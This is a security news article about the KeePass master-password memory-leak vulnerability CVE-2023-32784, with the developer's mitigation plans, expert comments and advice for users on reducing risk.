Another vulnerability that can expose master passwords in KeePass has surfaced, after one was discovered to start the year. The new security exploit involves traces of the password being left in system memory, and potentially reassembled if the memory is dumped.
KeePass has said that it plans to patch the issue with the next release of the software, but that it was not an immediate threat to most users as it would require an unusual level of access to a victim’s PC.
KeePass security exploit digs user passwords out of system memory
The security exploit (CVE-2023-32784) is present in all of the current (2.x) versions of the popular open source password manager. It does not impact the older 1.x versions, and has the quirk of requiring the user to type in the password rather than copying it from some sort of existing file. The exploit was disclosed by security researcher “vdohney” on a Sourceforge discussion forum in early May, and KeePass administrator Dominik Reichl (founder and creator of the project) quickly responded with mitigation measures.
However, Reichl also said that the issue would not be addressed for the general public until the next official release of KeePass (2.54), which does not have a firm release date but could be as far out as July. The security exploit is not something that an attacker can directly exploit, but it could be used remotely if they have high-level access to a system via some sort of malware (though there are more direct ways of compromising KeePass with this level of access). Otherwise, it would require physical access to a computer or its storage devices.
The attacker simply needs to access a process memory dump from any source. A flaw in KeePass leaves traces of the master password throughout system memory whenever it is typed, each time exposing one of the password’s characters in plaintext in a leftover string. Reichl’s immediate mitigation cuts down on the creation of these managed strings, and chaff is generated to hide those that remain with strings that match the password’s length that contain random junk characters. He also indicated that other security improvements would be included with the eventual 2.54 release.
Password manager users may be unaware of illicit pathways to master passwords
While this is a concerning security exploit, memory-based master password extraction tools such as KeeFarce have existed for nearly a decade now. And this is not a problem that is exclusive to KeePass; password managers are generally vulnerable to tools that attack system memory, particularly when a user is already logged in or if the operating system is fully compromised. This particular vulnerability can capture strings long after the user had logged out, however, and can even grab the master password from RAM if it is exploited quickly enough.
As Casey Ellis, Founder and CTO at Bugcrowd, notes: “The vulnerability is fairly esoteric, and given the “keys to the kingdom” nature of password vaults, they are rightfully held to a much higher standard when it comes to code hygiene and security testing and auditing. The exploit itself isn’t trivial, but the PoC released by vdohney makes exploitation relatively simple and straightforward. I would be very surprised if we didn’t see attackers looking for KeePass on compromised machines and taking advantage of this window of exploitation before the KeePass user-base has patched their systems.”
Master password systems often come packaged with the caveat that they can no longer be considered secure if the attacker has either complete remote access or even non-privileged direct physical access to the computer. This had already been illustrated by the prior KeePass security exploit this year that emerged in early February, which allowed an attacker with direct access to system files to swap user XML configuration settings and capture plaintext passwords.
While KeePass users wait for the forthcoming update, they can take some steps to reduce risk if they are concerned about someone having access to their system. The swap file (pagefile.sys) and hibernation file (hiberfil.sys) can be cleared to take away two primary sources of a memory dump approach. And because of the quirk of the security exploit, users might consider using a supported MFA hardware key that enters the password with a button press to keep the vulnerable strings out of memory. They might also consider switching to the KeePassXC fork, which is not impacted by this vulnerability.
The last year or so has been a rough period for password managers, with nearly all of the big names in the market rocked by some security issue or another. A drawn-out LastPass breach dealt a severe blow to consumer confidence in the company, and several major competitors had issues with either malicious ads targeting their services or a form auto-fill vulnerability capturing master passwords.
But Craig Jones, Vice President of Security Operations at Ontinue, notes that the market still has secure options and that these systems are usually a net positive for security when users are expected to juggle a hundred different logins: “Discovering vulnerabilities in password managers serves as a reminder that no system is impervious to potential risks. However, with proper security measures and responsible usage, password managers can still be a valuable tool in enhancing password security and reducing the impact of data breaches. The most worrying detail in this KeePass password dumper is its ability to bypass the master password protection. By doing so, an attacker can potentially gain access to all stored passwords and sensitive information. This highlights a critical vulnerability that could be exploited by individuals with physical access to a victim’s computer or those capable of executing malicious code on the system.”
“While the exploit raises concerns, it is important to remember that vulnerabilities can exist in any software or system. and this needs physical access. The concentrated risk and potential pitfalls of password managers lie in the fact that compromising a single master password can potentially expose multiple accounts and sensitive information. However, it’s crucial to note that this particular vulnerability does not reflect the inherent weaknesses of all password managers. By choosing reputable and well-maintained password managers, regularly updating them, and following best practices, the security benefits of password managers can still outweigh the risks,” advised Jones.
